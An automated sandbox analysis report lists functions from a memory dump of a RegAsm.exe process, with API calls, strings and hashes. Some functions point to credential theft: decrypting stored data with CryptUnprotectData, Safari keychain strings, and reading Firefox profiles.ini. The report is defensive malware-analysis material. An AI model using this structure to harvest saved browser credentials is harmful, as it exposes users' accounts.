                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                • String ID:
                                                • API String ID: 2136311172-0
                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??2@??3@
                                                • String ID:
                                                • API String ID: 1936579350-0
                                                • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: free
                                                • String ID:
                                                • API String ID: 1294909896-0
                                                • Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                • Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: free
                                                • String ID:
                                                • API String ID: 1294909896-0
                                                • Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                • Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18

                                                Non-executed Functions

                                                Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • EmptyClipboard.USER32 ref: 00409882
                                                • wcslen.MSVCRT ref: 0040988F
                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                • CloseClipboard.USER32 ref: 004098D7
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                • String ID:
                                                • API String ID: 1213725291-0
                                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32 ref: 004182D7
                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                • free.MSVCRT ref: 00418370
                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                • String ID: OsError 0x%x (%u)
                                                • API String ID: 2360000266-2664311388
                                                • Opcode ID: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                • Opcode Fuzzy Hash: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Version
                                                • String ID:
                                                • API String ID: 1889659487-0
                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                • _wcsicmp.MSVCRT ref: 00402305
                                                • _wcsicmp.MSVCRT ref: 00402333
                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                • memset.MSVCRT ref: 0040265F
                                                • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                • API String ID: 2257402768-1134094380
                                                • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                • String ID: :stringdata$ftp://$http://$https://
                                                • API String ID: 2787044678-1921111777
                                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                • GetDC.USER32 ref: 004140E3
                                                • wcslen.MSVCRT ref: 00414123
                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                • _snwprintf.MSVCRT ref: 00414244
                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                • String ID: %s:$EDIT$STATIC
                                                • API String ID: 2080319088-3046471546
                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • EndDialog.USER32(?,?), ref: 00413221
                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                • memset.MSVCRT ref: 00413292
                                                • memset.MSVCRT ref: 004132B4
                                                • memset.MSVCRT ref: 004132CD
                                                • memset.MSVCRT ref: 004132E1
                                                • memset.MSVCRT ref: 004132FB
                                                • memset.MSVCRT ref: 00413310
                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                • memset.MSVCRT ref: 004133C0
                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                • wcscpy.MSVCRT ref: 0041341F
                                                • _snwprintf.MSVCRT ref: 0041348E
                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                Strings
                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                • {Unknown}, xrefs: 004132A6
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                • API String ID: 4111938811-1819279800
                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                • SetCursor.USER32(00000000), ref: 0040129E
                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                • String ID:
                                                • API String ID: 829165378-0
                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                • wcscpy.MSVCRT ref: 004041D6
                                                • wcscpy.MSVCRT ref: 004041E7
                                                • memset.MSVCRT ref: 00404200
                                                • memset.MSVCRT ref: 00404215
                                                • _snwprintf.MSVCRT ref: 0040422F
                                                • wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 0040426E
                                                • memset.MSVCRT ref: 004042CD
                                                • memset.MSVCRT ref: 004042E2
                                                • _snwprintf.MSVCRT ref: 004042FE
                                                • wcscpy.MSVCRT ref: 00404311
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                • API String ID: 2454223109-1580313836
                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                • API String ID: 4054529287-3175352466
                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _snwprintf$memset$wcscpy
                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                • API String ID: 2000436516-3842416460
                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                • String ID:
                                                • API String ID: 1043902810-0
                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                • free.MSVCRT ref: 0040E49A
                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                • memset.MSVCRT ref: 0040E380
                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                • wcschr.MSVCRT ref: 0040E3B8
                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
